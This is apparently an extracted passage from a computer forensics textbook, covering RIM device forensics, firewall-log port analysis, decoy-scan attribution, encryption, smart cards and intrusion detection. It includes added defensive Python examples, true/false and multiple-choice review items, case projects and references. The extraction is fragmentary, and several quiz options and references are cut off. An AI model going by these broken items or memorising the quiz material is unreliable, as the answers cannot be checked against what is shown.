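    print("originating host:", result["origin"])
    print("logged-on user  :", result["x_sender"])
    for flag in result["flags"]:
        print("indicator       :", flag)
```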
SECURITY AND WIRELESS TECHNOLOGIES
There are two types of RIM devices within each model class
...
The Exchange Edition employs Triple-DES encryption to send and receive, but the Internet Edition communicates in clear text
...
Relevance of RIM Computer Forensics
A RIM device shares the same evidentiary value as any other personal digital assistant (PDA)
...
However, the RIM’s
always-on, wireless push technology adds a unique dimension to forensic examination
...
In
fact, a RIM device does not need a cradle or desktop connection to be useful
...
Thus, the RIM’s currently unsurpassed portability is the examiner’s greatest ally
...
The logs must be accessed on the original unit before the programmer software development kit (SDK) tool is applied
...
Rather, they are reviewed using the following hidden
control functions
...
An
image or bit-by-bit backup is acquired using an SDK utility that dumps the contents
of the Flash RAM into a file easily examined with a hex editor
...
A reset can mean a file system cleanup
...
Evidence Review
Two options are available for information review using the hex dump: manual review of the Hex file using a hex editor and loading of the hex file into the BlackBerry
SDK simulator for review
...
Using
the SDK will assist in decoding dates on extant records
...
This abstraction qualifies as a file translation layer (FTL), hiding what is really a quite
complicated system of file management
...
Flash is organized similarly to dynamic random access memory (DRAM) and has
the 65 ns read performance to match
...
Writing flash is a binary AND or NAND, meaning each
1 in memory can be toggled to 0 but not back again without an erasure
...
An erasure costs more in terms of time than a write because of conditioning
...
Hidden databases,
partition gaps, and obfuscated data are but a few
...
Custom databases with no icon in the Ribbon graphical user interface (GUI)
are capable of providing hidden data transport
...
The average user
or uninformed investigator will never have knowledge of the hidden database
...
Unfortunately, it will need to be installed on the unit investigated for it to function
...
The computer forensics specialist can use this information to help figure out what hackers or worms are up to
...
A connection consists
of the pair of IP addresses that are talking to each other, as well as a pair of port numbers that identify the protocol or service
...
When a firewall blocks
a connection, it will save the destination port number to its logfile
...
Port numbers are divided into three ranges:
The well-known ports are those from 0 through 1023
...
For example, port 80 virtually always indicates HTTP traffic
...
These are loosely bound to services, which means that while there are numerous services “bound” to these ports, these ports are likewise used for many other purposes
that have nothing to do with the official server
...
In theory,
no service should be assigned to these ports
...
However,
there are exceptions: for example, Sun starts their RPC ports at 32768
...
Usually, this is due to a “decoy” scan, such as in
“nmap
...
Computer forensics and protocol analysis can be used to track down who this
is
...
This will at least
point a finger at a decoy scan
...
Newer versions of scanners now randomize the attacker’s own TTL, making it harder to weed them out
...
You will often see that the attacker has
actually connected to you recently, while the decoyed addresses haven’t
...
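An added example (not from the book) of the firewall-log analysis described above: it sorts blocked destination ports into the three ranges and, for a set of probe sources, applies the two indicators the text gives for separating the real scanner from its decoys, an earlier completed connection and a TTL that stands apart from the others. The log lines, addresses and field layout are constructed for the example.

```python
"""Blocked-port summary and decoy-scan attribution over firewall log lines.

Added example (not from the book). LOG is a constructed log in a simple
key=value layout with documentation-only addresses; DROP records are blocked
probes against one server and ACCEPT records are earlier completed connections.
"""
import re
from collections import Counter, defaultdict

LOG = """\
2004-03-01T09:12:03 ACCEPT src=198.51.100.7 dst=203.0.113.5 dport=80 ttl=57
2004-03-01T09:40:11 ACCEPT src=192.0.2.44 dst=203.0.113.5 dport=25 ttl=51
2004-03-01T10:00:01 DROP src=198.51.100.7 dst=203.0.113.5 dport=445 ttl=57
2004-03-01T10:00:01 DROP src=192.0.2.199 dst=203.0.113.5 dport=445 ttl=128
2004-03-01T10:00:01 DROP src=203.0.113.77 dst=203.0.113.5 dport=445 ttl=128
2004-03-01T10:00:02 DROP src=198.51.100.7 dst=203.0.113.5 dport=1433 ttl=57
2004-03-01T10:00:02 DROP src=192.0.2.199 dst=203.0.113.5 dport=1433 ttl=128
2004-03-01T10:00:02 DROP src=203.0.113.77 dst=203.0.113.5 dport=1433 ttl=128
2004-03-01T10:00:03 DROP src=198.51.100.7 dst=203.0.113.5 dport=51234 ttl=57
2004-03-01T10:00:03 DROP src=192.0.2.199 dst=203.0.113.5 dport=51234 ttl=128
2004-03-01T10:00:03 DROP src=203.0.113.77 dst=203.0.113.5 dport=51234 ttl=128
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)"
    r"\s+dport=(?P<dport>\d+)\s+ttl=(?P<ttl>\d+)"
)


def port_range(port):
    """Classify a port by the three ranges the text describes; the registered
    range is the middle one between well-known and dynamic/private."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range: %d" % port)
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"


def parse_log(text):
    """Turn matching log lines into dicts; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["dport"] = int(d["dport"])
            d["ttl"] = int(d["ttl"])
            records.append(d)
    return records


def blocked_port_summary(records):
    """Count blocked destination ports per range, the data a firewall log keeps."""
    summary = defaultdict(Counter)
    for r in records:
        if r["action"] == "DROP":
            summary[port_range(r["dport"])][r["dport"]] += 1
    return summary


def attribute_scan(records):
    """Map each probing source to the indicators (from the text) that it is the real scanner."""
    drops = [r for r in records if r["action"] == "DROP"]
    sources = sorted({r["src"] for r in drops})
    prior = {r["src"] for r in records if r["action"] == "ACCEPT"}
    ttls = {s: {r["ttl"] for r in drops if r["src"] == s} for s in sources}
    # Decoy probes are generated on one machine, so they tend to share a TTL;
    # a source whose TTL stands apart from all the others is the odd one out.
    ttl_counts = Counter(next(iter(t)) for t in ttls.values() if len(t) == 1)
    scores = {}
    for s in sources:
        reasons = []
        if s in prior:
            reasons.append("completed a connection earlier")
        t = ttls[s]
        if len(t) == 1 and ttl_counts[next(iter(t))] == 1 and len(sources) > 2:
            reasons.append("TTL %d differs from the other sources" % next(iter(t)))
        scores[s] = reasons
    return scores


def most_likely(records):
    """The source with the most indicators, or None when nothing stands out."""
    scores = attribute_scan(records)
    best = max(scores, key=lambda s: len(scores[s]), default=None)
    return best if best and scores[best] else None


if __name__ == "__main__":
    recs = parse_log(LOG)
    for rng, ports in blocked_port_summary(recs).items():
        print(rng, dict(ports))
    print("most likely real scanner:", most_likely(recs))
```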
Now let’s briefly look at how both government and commercial organizations
are implementing secure biometric personal identification (ID) systems to improve
confidence in verifying the identity of individuals seeking access to physical or virtual locations for computer forensics purposes
...
BIOMETRIC SECURITY SYSTEMS
The verification of individuals for computer forensics purposes is achieved using a
recognized ID credential issued from a secure and effective identity confirmation
process
...
A secure biometric ID
system can provide individuals with trusted credentials for a wide range of applications, from enabling access to facilities or secure networks, to proving an individual’s rights to services, to conducting online transactions
...
Biometric technologies, when used with a well-designed ID system, can provide the
means to ensure that an individual presenting a secure ID credential has the absolute
right to use that credential
...
Secure ID systems that require the highest degree
of security and privacy are increasingly implementing both smart card and biometric
technology
...
Smart cards provide the secure, convenient,
and cost-effective ID technology that stores the enrolled biometric template and
compares it to the live biometric template
...
Today computers are used in every facet of life
to create messages, compute profits, transfer funds, access bank accounts, and
browse the Internet for good and bad purposes
...
Computer users today have the benefits of super computer speeds and fast
Internet communications on a worldwide basis
...
In the past, documentary evidence was primarily limited to paper documents
...
Most documents today are stored on computer hard disk drives, floppy
diskettes, zip disks, and other types of removable computer storage media
...
Paper documents are no longer
considered the best evidence
...
Unlike paper documentation, computer evidence is fragile, and a
copy of a document stored in a computer file is identical to the original
...
Another unique aspect of computer evidence is the potential for unauthorized copies to be made of important computer files without leaving behind a trace
that the copy was made
...
Industrial espionage is alive and well in the cyber age, and the computer forensics specialist relies on computer evidence to prove the theft of trade secrets
...
The existence of this type of computer evidence is typically not known to the computer user, and the element of surprise can provide the computer forensics investigator with the advantage in the
interview of suspects in such cases
...
Computer evidence is relied on more and more in criminal and civil litigation
actions
...
Oliver North got into some of his trouble
with the U.S. Congress when erased computer files were recovered as computer evidence
...
In the
past, much wasted government and company staff time was attributed to the playing of the Windows Solitaire game on company time
...
Internet access by employees has also
created new problems associated with employees operating side businesses through
the unauthorized use of company and government Internet accounts
...
Computer forensics tools and methodologies are used to identify and document computer evidence associated
with these types of computer abuses and activities
...
Most individuals think that
computer evidence is limited to data stored only in computer files
...
Computer evidence can exist in many forms
...
In Windows NT-based computer systems, the files
are called Page Files and the file is named PAGEFILE
...
Computer evidence can also be found in file slack and in unallocated file space
...
As much as 50% of the computer hard disk drive may contain such
data types in the form of email fragments, word processing fragments, directory
tree snapshots, and potentially almost anything that has occurred in past work sessions on the subject computer
...
Timelines of computer usage and file accesses can be valuable sources of computer evidence
...
Now let’s look at some of the more common conclusions that computer forensics technology can hope to answer
...
Conclusions Drawn
The term computer forensics was coined in 1991 in the first training session
held by the International Association of Computer Specialists (IACIS) in Portland, Oregon
...
Like any other forensic science, computer forensics deals with the application
of law to a science
...
Computer forensics has also been described as the autopsy of a computer hard
disk drive because specialized software tools and techniques are required to analyze the various levels at which computer data is stored after the fact
...
The field is relatively new to the private sector but it has been the mainstay of technology-related investigations and intelligence gathering in law enforcement and military agencies since the mid-1980s
...
Typically, computer forensic tools exist in the form of computer software
...
The use of different tools that have been developed independently to validate
results is important to avoid inaccuracies introduced by potential software design flaws and software bugs
...
Cross-validation through the use of multiple tools and techniques is standard
in all forensic sciences
...
Validation through the use of multiple software tools, computer specialists, and
procedures eliminates the potential for the destruction of forensic evidence
...
Society in general benefited, but so did criminals who use personal computers
in the commission of crimes
...
Computer forensics is used to identify evidence when personal computers are
used in the commission of crimes or in the abuse of company policies
...
In the past, documentary evidence was typically stored on paper and copies
were made with carbon paper or photocopy machines
...
Computer forensics deals with finding, extracting, and documenting this form
of electronic documentary evidence
...
1 in Appendix F), the computer forensics specialist should adhere to the provisional list of
actions for some of the principal types of computer forensic technology
...
A number of these technologies have been mentioned
in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Processing procedures and methodologies should not conform
to federal computer evidence processing standards
...
True or False? Computer evidence is fragile and susceptible to alteration or erasure by any number of occurrences
...
True or False? The need to preserve the computer evidence before processing a
computer should not be clearly demonstrated by the computer forensic
instructor through the use of programs designed to destroy data and modify
the operating systems
...
True or False? The documentation of forensic processing methodologies and
findings is not important
...
True or False? The occurrence of random memory dumps in hidden storage
areas should be discussed and covered in detail during workshops
...
The following are what it really costs to replace a stolen computer, except:
A
...
The price of replacing the software
C
...
The cost of lost production time or instruction time
E
...
Forensic services include but are not limited to the following, except:
A
...
Location and retrieval of deleted and hidden files
C
...
Email non-supervision and non-authentication
E
...
Port numbers are divided into three ranges, except for two of the following:
A
...
These are loosely
bound to services, and usually traffic on this port clearly indicates the protocol for that service
...
B
...
These are tightly
bound to services, and usually traffic on this port clearly indicates the protocol for that service
...
C
...
These are loosely
bound to services, which means that while there are numerous services
“bound” to these ports, these ports are likewise used for many other purposes that have nothing to do with the official server
...
The dynamic and private ports are those from 49152 through 65535
...
E
...
These are tightly
bound to services, which means that while there are numerous services
“bound” to these ports, these ports are likewise used for many other purposes that have nothing to do with the official server
...
A secure ID system using smart card and biometric technology provides the
following, except:
A
...
Improved security, protecting information, and processes within the ID
system and actively authenticating the trust level of the environment before
releasing information
C
...
Improved system return on investment through the flexibility and upgradability that smart cards provide, allowing support of different authentication methods and multiple, evolving applications
E
...
The legal aspects of a computer forensics investigation center primarily on the
following two main issues:
A
...
The requirements that need to be met in order for evidence to be successfully presented in court and, of course, considered legally admissible
C
...
The acceptance of the investigator to avoid the possibility of incurring
legal action against himself or the organization for whom he is reviewing
the investigation
E
...
The data resided in email, text documents, and file attachments
...
How would your advanced
document management services center (DMSC) handle this document review?
HANDS-ON PROJECTS
A large real estate corporation retained an accounting firm to investigate allegations
of embezzlement
...
How would
the accounting firm’s computer forensics team go about investigating this case?
Case Project
Let’s look at a real-world scenario and see how computer forensics plays into it
...
You’ve just inherited a large, diverse enterprise with
relatively few security controls when something happens
...
Even those attackers tricky enough
to slip through the firewall bounce harmlessly off your highly secured servers and trip
alarms throughout the network as they attempt to compromise it
...
You do have ways to stop the pain
...
For the purposes of this discussion, a number of these incidents have been
blended together to create a hypothetical company, Webfile
...
This case project discusses forensics in a Windows environment
...
How would you,
as a computer forensics specialist, go about detecting potential incidents, identifying the attack, and conducting host-based forensics?
Optional Team Case Project
This optional team case project discusses forensics in a Windows environment
...
Along the way, there will be a discussion
of some of the tools and techniques that are useful in this type of detective work
...
Before you start with the eradication phase of your incident
response, you really need to complete the identification phase: you have yet to
identify the initial compromise method or to identify the scope of the compromise!
At this point in the investigation, you have reason to believe the attackers are
making illicit use of the victim network to serve content to their friends and neighbors
...
Of more concern,
the investigation so far has yielded information that indicates the attackers have
compromised both local and domain administrator accounts in your enterprise
...
You want to determine how widespread the attacker’s control over the network is, what the initial compromise method was, and
who the attacker is (if possible)
...
REFERENCES
[1]
Feldman, John, and Giordano, Joseph V
...
, New York, NY 10017-5391, 2001
[2] WetStone Technologies, Inc
...
, Freeville, NY 13068,
2001
...
0 Evidence Grade Bitstream Backup Utility,” New Technologies, Inc
...
, Gresham, Oregon 97030
...
All rights reserved), 2004
...
, 2075 NE Division St
...
(© 2002
...
All
rights reserved), 2004
...
, 2075 NE Division St
...
(© 2004, New Technologies, Inc
...
[6]
“FILTER_G: English Grammer Forensic Filter,” New Technologies,
Inc
...
, Gresham, Oregon
...
All rights reserved), 2004
...
, 143 Main Street, Nanuet, NY 10954, 2001
...
, 2075 NE Division St
...
(© 2004, New
Technologies, Inc
...
[9] “PC PhoneHomeTM” is a trademark of Brigadoon Software, 143 Main
St
...
(PC PhoneHome Web site content: Copyright
2001-2005 Brigadoon Software, Inc
...
) (Web site copy
Copyright 2000-2005 SecurityKit
...
All rights reserved
...
[11] Walker, Don, “Computer Forensics: Techniques for Catching the ‘Perp’
Protect Company Data,” Enterprise Networks & Servers, Publications &
Communications, Inc
...
, Suite 150, Austin, TX
78759, (© 2003-2004 by Publications & Communications Inc
...
[12] “Data Recovery,” Kessler International World Headquarters, 45 Rockefeller Plaza, Suite 2000, New York, NY 10111-2000, (© 1995-2004
Michael G
...
All Rights Reserved), 2004
...
29, Munich, Germany
80469, (© 1998-2004 USUS], 2004
...
, 683 N
Main St
...
[15] “Smart Cards and Biometrics in Privacy-Sensitive Secure Personal Identification Systems,” Smart Card Alliance, 191 Clarksville Rd
...
[16] “2003 Computer Crime and Security Survey,” Federal Bureau of Investigation, J
...
, NW, Washington, D
...
20535-0001, 2003
...
It seems that any product that can remotely be tied to
network or computer security is quickly labeled as a “forensics” system
...
Today’s corporate climate of increased competition, cutbacks and layoffs, and outsourcing makes it essential that
corporate security policy and practices support the inevitability of future litigation
...
Answering the questions raised in this chapter will assist managers in creating sound corporate security policies and practices that support the
following computer forensics systems:
C
Internet security systems
Intrusion detection systems
Firewall security systems
Storage area network security systems
Network disaster recovery systems
Public key infrastructure security systems
Wireless network security systems
Satellite encryption security systems
Instant messaging (IM) security systems
Net privacy systems
Identity management security systems
Identity theft prevention systems
Biometric security systems
Homeland security systems
INTERNET SECURITY SYSTEMS
Internet and network security are topics that many executives and managers avoid
talking about
...
This lack of dialog has
resulted in some executives not being fully aware of the many advances and innovations in security technology that enable companies to confidently take full advantage of the benefits and capabilities of the Internet and intranets [1]
...
The purpose of this section is to demystify and inform the executive how Internet security can easily and effectively be implemented
in order to conduct computer forensics [1]
...
This policy needs to define the adequate and appropriate
Internet security measures necessary to safeguard a company’s systems, networks,
transactions, and data [1]
...
This step is no more difficult than the risk
management that a corporation already exercises every day
...
1 illustrates [1]
...
FIGURE 3.1 [figure residue; the recoverable labels are the information classes Public Information, Company Private, Departmental Private, and Mission Critical]
In addition to Internet security, attention should be given to physical security (restricting the use of modems and
removable media and controlling access to devices) [1]
...
There may be legal requirements for securing this information [1]
...
Of course, it’s possible to get a
bit carried away with what information is considered to be private [1]
...
This information is often provided to
customers and interested parties by means of the Internet [1]
...
Often the primary risk is found to be internal
...
In other cases, a remote dial-in line used for debugging could be used to
gain general access to internal systems, bypassing other Internet security safeguards
...
It is often helpful to examine how
existing situations are handled [1]
...
The more security desired, the greater the cost required to provide it
...
Thus, establishing a corporate Internet security policy
involves the following:
A high-level management policy statement
A systematic analysis of the organization’s assets
An examination of risks
Development of an implementation strategy [1]
Public and Private Key Encryption
For many business and electronic commerce applications, it is necessary to
transmit information over communications lines and networks where there is
the potential for data to be altered, forged, or illicitly introduced
...
Two keys
exist, one public, the other private
...
The private key is retained by the recipient and is used to decrypt the received information
...
To use public key encryption across the Internet, steps must be taken to ensure
the integrity of the public key and the identity of its owner
...
To achieve secure, two-way communication across the Internet, without having previously exchanged keys, the Diffie-Hellman scheme may be used as shown
in Figure 3.2
...
Each party obtains the public key for the other from a certificate
authority and performs a special calculation with their own private keys
...
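The exchange just described, worked through as an added example (code written for this page, not taken from the book or any product it names): each party obtains the other's public value from a certificate, verifies the certificate, and combines the public value with its own private exponent, so both sides arrive at the same secret without ever sending it. The modulus and generator below are an assumption for demonstration (not a standard DH group), and the HMAC keyed with a CA secret stands in for the CA's public-key signature; a real certificate authority signs with a private key so that anyone holding its public key can verify.

```python
import hashlib
import hmac
import json
import secrets

# Demonstration parameters (assumption): a prime modulus and small generator.
# Production code uses a named group such as those in RFC 3526.
P = 2**255 - 19
G = 2


def make_cert(ca_key: bytes, owner: str, pub: int) -> dict:
    """CA binds an owner name to a public value. HMAC is a stand-in for the
    CA's signature so the example runs offline; the verification flow is the same."""
    body = {"owner": owner, "pub": pub}
    tag = hmac.new(ca_key, json.dumps(body, sort_keys=True).encode(), hashlib.sha256).hexdigest()
    return {"body": body, "sig": tag}


def verify_cert(ca_key: bytes, cert: dict) -> bool:
    """Reject any certificate whose body was altered after the CA issued it."""
    expected = hmac.new(ca_key, json.dumps(cert["body"], sort_keys=True).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, cert["sig"])


def dh_private() -> int:
    """Fresh private exponent in the range 1 .. P-2."""
    return secrets.randbelow(P - 2) + 1


def dh_public(priv: int) -> int:
    """Public value g^priv mod p; this is what goes into the certificate."""
    return pow(G, priv, P)


def dh_shared(priv: int, peer_pub: int) -> int:
    """Own private exponent applied to the peer's public value."""
    if not 1 < peer_pub < P - 1:
        # degenerate values (0, 1, p-1) would force a predictable secret
        raise ValueError("peer public value out of range")
    return pow(peer_pub, priv, P)


def session_key(shared: int) -> bytes:
    """Never use the raw group element as a key; hash it into a fixed-size key."""
    return hashlib.sha256(shared.to_bytes(32, "big")).digest()


def exchange(ca_key: bytes, alice_priv: int, bob_priv: int) -> tuple:
    """Both parties fetch the other's certificate, check it, then derive a key."""
    alice_cert = make_cert(ca_key, "alice", dh_public(alice_priv))
    bob_cert = make_cert(ca_key, "bob", dh_public(bob_priv))
    if not (verify_cert(ca_key, bob_cert) and verify_cert(ca_key, alice_cert)):
        raise ValueError("certificate rejected")
    k_alice = session_key(dh_shared(alice_priv, bob_cert["body"]["pub"]))
    k_bob = session_key(dh_shared(bob_priv, alice_cert["body"]["pub"]))
    return k_alice, k_bob


if __name__ == "__main__":
    ka, kb = exchange(b"ca-secret", dh_private(), dh_private())
    print("keys match:", ka == kb)
```

The certificate check is the part that makes the scheme safe over an untrusted network: without it, anyone who can substitute a public value in transit ends up sharing a secret with each side separately.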
Network Security
Firewalls are a basic means for providing network security (and will be covered in
greater detail later in this chapter)
...
While
an important use of firewalls is to enable secure Internet access to corporate networks, they are also used to restrict access to departmental private and mission-critical information [1]
...
FIGURE 3.2 Diffie-Hellman calculation
...
For it to work correctly, merchants must connect to a network of banks (both acquiring and issuing
banks), processors, and other financial institutions so that payment information
provided by the customer can be routed securely and reliably
...
Because payment information is highly sensitive, trust and confidence are essential
elements of any payment transaction
...
The Payment Processing Network
Here’s a breakdown of the participants and elements involved in processing payments:
Acquiring Bank: In the online payment processing world, an acquiring bank
provides Internet merchant accounts
...
Examples of acquiring banks include Merchant
eSolutions and most major banks
...
In the online
payment processing world, an authorization also verifies that the billing information the customer has provided matches up with the information on record
with their credit card company
...
Examples include Visa® and MasterCard®
...
Customer Issuing Bank: A financial institution that provides a customer with
a credit card or other payment instrument
...
During a purchase, the customer issuing bank verifies that the payment information submitted to the merchant is valid and that the customer has
the funds or credit limit to make the proposed purchase
...
The merchant typically pays a processing fee for each transaction processed, also known as the
discount rate
...
The fees charged by the acquiring bank will vary
...
Payment Gateway: A service that provides connectivity among merchants, customers, and financial networks to process authorizations and payments
...
Processor: A large data center that processes credit card transactions and settles funds to merchants
...
Settlement: The process by which transactions with authorization codes are
sent to the processor for payment to the merchant
...
Controlling Access
One aspect of implementing a security policy is being able to control which users
have access to particular systems and the data that they can access
...
Some of these products will
be discussed in detail later in the chapter and throughout the book [1]
...
Many
companies provide each of their remote users with a digital token card (also called
hard tokens) to increase their assurance of the identity of each remote user [1]
...
Verisign is a commercial certification authority that issues digital certificates providing assurance of the identity of an individual
...
Additional information may also be included, depending on the type of certificate
...
Verisign provides two types of digital certificates: personal certificates to provide assurance of the identity of an individual and secure server certificates to protect communications with a given server and allow verification of the identity of a
server
...
A Class 2 personal certificate requires confirmation of name,
mailing address, and other personal information by an Equifax consumer database,
along with a physical mail-back process to ensure that the request was not generated by someone with access to an applicant’s personal information [1]
...
The process of obtaining a certificate will be similar to that shown in Figure 3
...
FIGURE 3 (figure number and caption lost in extraction; its three panels read as follows)
User
• Generate key pair
• Complete form
• Personally take form to bank
Bank / Certificate Authority
• Review form
• Verify identification
• Upon approval, generate certificate
• Give diskette with certificate to signer
User
• Install certificate
• Create signed messages and records
...
Privacy and Encryption
Another means of controlling access to information is to encrypt it
...
Encryption should only be used in a carefully thought-out
manner, as part of a security policy, not as a substitute for one [1]
...
It runs on virtually every platform
...
In other words, PGP offers the
advantage of running on a wide variety of systems and providing individuals with
the ability to keep certain data confidential [1]
...
Significant reduction in internal
corporate networking costs can be achieved by using secure, encrypted, Internet protocol (IP)-level network communications over less expensive public networks, called
secure virtual private networks (SVPN)
...
Security Futures: Smart Cards
Logically, a smart card is equivalent to an electronic safe deposit box
...
The software within the card detects attempts
at intrusion and tampering and monitors abnormal usage
...
While smart cards are popular in
Asia and Europe, they are just beginning to become popular here in the United
States
...
Health care: Portable, customized health care file with medical emergency data
and HMO and insurance information
...
Contactless tickets for ski resorts and airlines: Increases speed, convenience,
and security and facilitates baggage checking [1]
...
They offer superior security and lower life-cycle
costs than alternatives such as coins, paper money, and magnetic stripe cards [1]
...
There are many different algorithms in use for
smart cards, but all act to verify the authenticity of cards and to prevent misuse or
fraud
...
Limits are typically placed on the number of erroneous attempts, preventing brute-force attempts [1]
...
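The attempt limit mentioned above, modelled as an added example (written for this page; it is not any vendor's card operating system and the class and method names are assumptions): the card charges each PIN presentation against a try counter before comparing, resets the counter on success, and refuses all further presentations once the counter reaches zero, which is what caps an exhaustive guess at a handful of tries.

```python
import hmac


class PinCounterCard:
    """Simplified model of a smart card's PIN-try counter (assumption for
    illustration, not a real card OS)."""

    def __init__(self, pin: str, max_tries: int = 3):
        self._pin = pin.encode()
        self._max_tries = max_tries
        self._remaining = max_tries
        self.blocked = False

    @property
    def remaining(self) -> int:
        return self._remaining

    def verify(self, attempt: str) -> bool:
        """Return True only for a correct PIN presented to an unblocked card."""
        if self.blocked:
            return False
        # Charge the attempt BEFORE comparing: if power is removed during the
        # comparison the counter has already been decremented, so an
        # interrupted presentation can never become a free guess.
        self._remaining -= 1
        ok = hmac.compare_digest(self._pin, attempt.encode())  # constant-time compare
        if ok:
            self._remaining = self._max_tries  # a correct PIN restores the full budget
        elif self._remaining == 0:
            self.blocked = True  # refused until an out-of-band unblock procedure
        return ok


def guesses_before_block(card: PinCounterCard, digits: int = 4) -> int:
    """How many presentations an exhaustive search gets to make before the
    card blocks: the quantity the try limit is designed to cap."""
    guesses = 0
    for n in range(10 ** digits):
        if card.blocked:
            break
        card.verify(f"{n:0{digits}d}")
        guesses += 1
    return guesses


if __name__ == "__main__":
    card = PinCounterCard("4821")
    print("guesses allowed:", guesses_before_block(card), "blocked:", card.blocked)
```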
Now
let’s move on to the next computer forensics system: intrusion detection systems
...
They collect information from a variety of vantage points within computer
systems and networks and analyze this information for symptoms of security problems
...
Both intrusion detection and vulnerability assessment technologies allow organizations to
protect themselves from losses associated with network security problems
...
Protecting critical information systems and networks is a complex operation,
with many tradeoffs and considerations
...
This section also provides
the information one needs to be a savvy consumer in the areas of intrusion detection and vulnerability assessment
...
They accomplish this goal by collecting information from a variety of system and network sources and then analyzing the information for symptoms of security problems
...
Intrusion detection systems perform a variety of functions:
Monitoring and analysis of user and system activity
Auditing of system configurations and vulnerabilities
Assessing the integrity of critical system and data files
Recognition of activity patterns reflecting known attacks
Statistical analysis of abnormal activity patterns
Operating system audit trail management, with recognition of user activity reflecting policy violations [3]
Some systems provide additional features, including
Automatic installation of vendor-provided software patches
Installation and operation of decoy servers to record information about intruders [3]
The combination of these features allows system managers to more easily handle the monitoring, audit, and assessment of their systems and networks
...
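Three of the functions in the list above (recognition of known attack patterns, recognition of policy violations, and statistical analysis of abnormal activity) run over constructed sample log lines in this added example; it is written for this page and is not code from the book or from any intrusion detection product. The log format, the hosts, the business-hours window and the historical baseline are all assumptions.

```python
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample log (not from the page or any real system).
SAMPLE_LOG = """\
2024-03-04T09:02:11 srv1 sshd: Accepted password for alice from 10.0.0.5
2024-03-04T09:05:42 srv1 sshd: Failed password for root from 203.0.113.9
2024-03-04T09:05:43 srv1 sshd: Failed password for root from 203.0.113.9
2024-03-04T09:05:44 srv1 sshd: Failed password for admin from 203.0.113.9
2024-03-04T09:05:45 srv1 sshd: Failed password for admin from 203.0.113.9
2024-03-04T09:05:46 srv1 sshd: Failed password for oracle from 203.0.113.9
2024-03-04T10:15:00 srv1 payroll: user=carol action=open record=emp-1042
2024-03-04T23:41:07 srv1 payroll: user=bob action=open record=emp-0007
2024-03-04T23:41:30 srv1 payroll: user=bob action=export record=all
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>\w+): (?P<msg>.*)$")
FAILED_RE = re.compile(r"Failed password for (?P<user>\S+) from (?P<src>\S+)")
PAYROLL_RE = re.compile(r"user=(?P<user>\S+) action=(?P<action>\S+)")


def parse(log: str) -> list:
    """Turn raw lines into event dicts with a parsed timestamp."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.fromisoformat(d["ts"])
            events.append(d)
    return events


def failed_logins_by_source(events) -> dict:
    by_src = defaultdict(list)
    for e in events:
        m = FAILED_RE.search(e["msg"]) if e["prog"] == "sshd" else None
        if m:
            by_src[m["src"]].append(e["ts"])
    return by_src


def detect_bruteforce(events, threshold=5, window_s=60) -> list:
    """Known-attack pattern: threshold failed logins from one source inside window_s."""
    alerts = []
    for src, times in failed_logins_by_source(events).items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                alerts.append(("bruteforce", src, threshold))
                break
    return alerts


def detect_after_hours(events, start_h=8, end_h=18) -> list:
    """Policy violation: payroll access outside the assumed business-hours window."""
    alerts = []
    for e in events:
        if e["prog"] != "payroll":
            continue
        m = PAYROLL_RE.search(e["msg"])
        if m and not (start_h <= e["ts"].hour < end_h):
            alerts.append(("after_hours", m["user"], m["action"]))
    return alerts


def detect_anomalous_volume(events, baseline, z=3.0) -> list:
    """Statistical rule: a source whose failed-login count sits more than z
    standard deviations above a baseline of historical daily counts."""
    mean = statistics.mean(baseline)
    sd = statistics.pstdev(baseline) or 1.0
    counts = Counter({src: len(t) for src, t in failed_logins_by_source(events).items()})
    return [("anomaly", src, n) for src, n in counts.items() if (n - mean) / sd > z]


def run(log: str = SAMPLE_LOG) -> list:
    ev = parse(log)
    # constructed baseline: failed logins per source seen on seven quiet days
    return detect_bruteforce(ev) + detect_after_hours(ev) + detect_anomalous_volume(ev, [0, 1, 0, 2, 1, 0, 1])


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

The three detectors answer different questions about the same records, which is why the text lists them separately: the signature rule needs no history, the policy rule needs only the policy, and the statistical rule needs a baseline and will flag activity that no signature describes.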
Vulnerability Assessment and Intrusion Detection
Vulnerability assessment products (also known as scanners) perform rigorous examinations of systems in order to determine weaknesses that might allow security violations
...
First,
passive, host-based mechanisms inspect system configuration files for unwise settings, system password files for weak passwords, and other system objects for security
policy violations
...
The results of vulnerability assessment tools represent a snapshot of system security at a point in time
...
Because they offer benefits that
are similar to those provided by intrusion detection systems, they are included in
the sphere of intrusion detection technologies and products [3]
...
Products are therefore designed with user-friendly interfaces that assist system administrators in their installation, configuration, and use
...
Many vendors provide consulting and integration services to assist customers in successfully
using their products to achieve their security goals [3]
...
Intrusion detection and vulnerability assessment products provide capabilities needed as part of sound network security management practice [3]
...
One way of
characterizing the difference is provided by classifying security violations by source—
whether they come from outside the organization’s network or from within
...
This is a valuable
function and would be sufficient protection were it not for these facts:
Not all access to the Internet occurs through the firewall
...
Firewalls are subject to attack themselves [3]
...
The
firewall cannot mitigate risk associated with connections it never sees [3]
...
Again, the firewall only sees traffic at the boundaries between the internal network and the Internet
...
As more organizations utilize strong encryption to secure files and public network connections, the focus of adversaries will shift to those places in the network in
which the information of interest is not as likely to be protected: the internal network
...
Therefore, they will become even more important as
security infrastructures evolve [3]
...
A common attack strategy is to utilize tunneling to
bypass firewall protections
...
Trust and Intrusion Detection
Another area of discussion when considering the value of intrusion detection systems is the need to monitor the rest of the security infrastructure
...
Given their vital roles, however, they are also prime targets of attack by adversaries
...
Be it due to misconfiguration, outright failure, or attack, the failure of any of these components of the security infrastructure
jeopardizes the security of the systems they protect [3]
...
Vulnerability
assessment products also allow system management to test new configurations of
the security infrastructure for flaws and omissions that might lead to problems [3]
...
It is an ongoing process targeting a dynamic environment in which new threats arise daily [3]
...
Much of the classic, government-sponsored work in
